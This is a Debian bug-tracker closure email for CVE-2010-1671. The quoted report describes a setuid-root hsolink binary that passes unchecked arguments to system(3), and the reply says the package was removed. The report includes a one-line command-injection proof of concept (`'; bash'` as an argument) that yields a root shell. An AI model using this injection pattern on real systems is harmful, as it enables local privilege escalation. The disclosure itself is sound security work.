Your message dated Thu, 29 Jul 2010 17:46:00 -0400 with message-id <20100729214600.GA19629@galadriel.inutil.org> and subject line Re: insecure setuid usage, local root exploit has caused the Debian Bug report #590670, regarding insecure setuid usage, local root exploit to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact owner@bugs.debian.org immediately.) -- 590670: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590670 Debian Bug Tracking System Contact owner@bugs.debian.org with problems
--- Begin Message ---
- To: submit@bugs.debian.org
- Subject: insecure setuid usage, local root exploit
- From: Thijs Kinkhorst <thijs@debian.org>
- Date: Wed, 28 Jul 2010 13:09:06 +0200
- Message-id: <[🔎] 201007281309.11718.thijs@debian.org>
Package: hsolink Version: 1.0.118-3 Severity: critical Tags: security Hi, Following was reported by Christian Jaeger. ---------- hsolink-1.0.118 contains a binary hsolinkcontrol that is setuid root. The binary - neither sets PATH - nor fixes other environment variables - nor checks commandline arguments - but uses system(3) (- and may be overflowing fixed-size buffers as well, I didn't check anymore) and thus is a trivial target to get root, for example: (I've tested from the files in an ar-unpacked .deb instead of installing the deb, to avoid exposing my system. Note: apparently the binary has to be at root-owned paths or the Linux kernel will ignore the setuid bit.) novo:~/chris# l -a total 12 -rwsr-xr-x 1 root root 7072 2010-07-09 22:20 hsolinkcontrol drwxr-x--- 2 root chris 80 2010-07-09 22:55 . drwxr-xr-x 50 root root 4272 2010-07-09 22:55 .. chris@novo:/root/chris$ ./hsolinkcontrol down '; bash' Using resolvconf. root@novo:/root/chris# id uid=0(root) gid=1000(chris) groups=..... The setuid recommendation is coming from the upstream author (http://www.pharscape.org/hsolinkcontrol.html), who apparently is not aware of the implications of the setuid bit, and good security in general as evidenced by the problems I've listed above. I have not informed him of the problem [yet]. I don't know about the right solution; maybe using sudo instead of setuit and adding commandline argument checking and replacing system calls with fork/exec* calls. Or, to be safer, instead rather turn it into a daemon. Iff it needs to be run as ordinary users at all--I'm used to have to run "pon" as root, for example, the charge to enable a normal user to run hsolinkcontrol (or the program that uses it) as root (by setting up sudo, for example) could possibly just be left to the user (I can't say as I haven't used the program yet). ---------- Debian has assigned CVE-2010-1671 to this issue. Cheers, ThijsAttachment: signature.asc
Description: This is a digitally signed message part.
--- End Message ---
--- Begin Message ---
- To: Thijs Kinkhorst <thijs@debian.org>
- Cc: 590670-done@bugs.debian.org
- Subject: Re: insecure setuid usage, local root exploit
- From: Moritz Muehlenhoff <jmm@inutil.org>
- Date: Thu, 29 Jul 2010 17:46:00 -0400
- Message-id: <20100729214600.GA19629@galadriel.inutil.org>
- In-reply-to: <[🔎] 201007281309.11718.thijs@debian.org>
- References: <[🔎] 201007281309.11718.thijs@debian.org>
On Wed, Jul 28, 2010 at 01:09:06PM +0200, Thijs Kinkhorst wrote: > Package: hsolink > Version: 1.0.118-3 > Severity: critical > Tags: security > > Hi, > > Following was reported by Christian Jaeger. > > ---------- > > hsolink-1.0.118 contains a binary hsolinkcontrol that is setuid root. > The binary I have filed a removal bug and hsolink has been removed (#590751). Closing the bug. Cheers, Moritz
--- End Message ---